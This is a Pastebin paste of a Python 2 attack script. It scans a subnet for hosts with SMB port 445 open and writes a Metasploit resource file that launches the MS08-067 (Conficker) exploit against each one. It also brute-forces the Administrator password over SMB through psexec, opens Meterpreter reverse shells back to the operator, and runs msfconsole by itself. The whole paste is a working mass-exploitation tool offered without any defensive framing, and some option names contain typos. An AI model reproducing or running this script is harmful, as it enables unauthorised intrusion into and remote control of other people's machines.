API tools faq
paste
Guest User

Untitled

a guest
May 23rd, 2018
154
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.85 KB | None | 0 0
raw download clone embed print report
  1. import os
  2. import sys
  3. import argparse
  4. import nmap
  5.  
  6.  
  7. def findTgts(subnet):
  8. nmScan = nmap.PortScanner()
  9. nmScan.scan(subnet, '445')
  10. tgtHosts = []
  11. for host in nmScan.all_hosts():
  12. if nmScan[host].has_tcp(445):
  13. state = nmScan[host]['tcp'][445]['state']
  14. if state == 'open':
  15. tgtHosts.append(host)
  16. return tgtHosts
  17.  
  18. def setupHandler(configFile, lhost, lport):
  19. configFile.write('use exploit/multi/handler\n')
  20. configFile.write('set payload ' + 'windows/meterpreter/reverse_tcp\n')
  21. configFile.write('set lhost=' + lhost + '\n')
  22. configFile.write('set lport=' + str(lport) + '\n')
  23. configFile.write('exploit -j -z' + '\n')
  24. configFile.write('setg DisablePayloadHandler 1' + '\n')
  25.  
  26. def confickerExploit(configFile,tgtHost,lhost,lport):
  27. configFile.write('use exploit/windows/smb/ms08_067_netapi\n')
  28. configFile.write('set RHOST=' + str(tgtHost) + '\n')
  29. configFile.write('set payload '+ 'windows/meterpreter/reverse_tcp' + '\n')
  30. configFile.write('set lhhost=' + str(lhost)+ '\n')
  31. configFile.write('set lport=' + str(lport) + '\n')
  32. configFile.write('exploit -jz' + '\n')
  33.  
  34. def smbBrute(configFile, tgtHost, passFile, lhost, lport):
  35. user = 'Administrator'
  36. pF = open(passFile, 'r')
  37. for password in pF.readlines():
  38. password = password.strip('\n').strip('\r')
  39. configFile.write('use exploit/windows/smb/ps_exec\n')
  40. configFile.write('set rhost=' + str(tgtHost) + '\n')
  41. configFile.write('set SMBUser=' + str(user) + '\n')
  42. configFile.write('set SMBPass' + str(password) + '\n')
  43. configFile.write('set payload '+ 'windows/meterpreter/reverse_tcp' + '\n')
  44. configFile.write('set lhost=' + str(lhost) + '\n')
  45. configFile.write('set lport=' + str(lport) + '\n')
  46. configFile.write('exploit -jz' + '\n')
  47.  
  48.  
  49. def main():
  50. configFile = open('Conf.rc','w')
  51. parser = argparse.ArgumentParser(prog='Metasploittest') # type: str
  52. parser.add_argument('-lh','--lhost',help='Your own IP',default='127.0.0.1')
  53. parser.add_argument('-lp', '--lport',help='Your own Port')
  54. parser.add_argument('-rh', '--rhost', help='The IP to be attacked')
  55. parser.add_argument('-pf', '--password', help='The password file to be used')
  56. args = parser.parse_args()
  57. lhost = args.lhost
  58. lport = args.lport
  59. rhost = args.rhost
  60. passFile = args.password
  61. if rhost == None or lhost == None or passFile == None:
  62. print parser.print_help()
  63. sys.exit(1)
  64. if lport == None:
  65. lport = '1337'
  66. tgtHosts = findTgts(rhost)
  67. setupHandler(configFile,lhost,lport)
  68. for tgtHost in tgtHosts:
  69. confickerExploit(configFile,tgtHost,lhost,lport)
  70. if passFile != None:
  71. smbBrute(configFile,tgtHost,passFile,lhost,lport)
  72. configFile.close()
  73. os.system('msfconsole -r Conf.rc')
  74. if __name__ == "__main__":
  75. main()
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!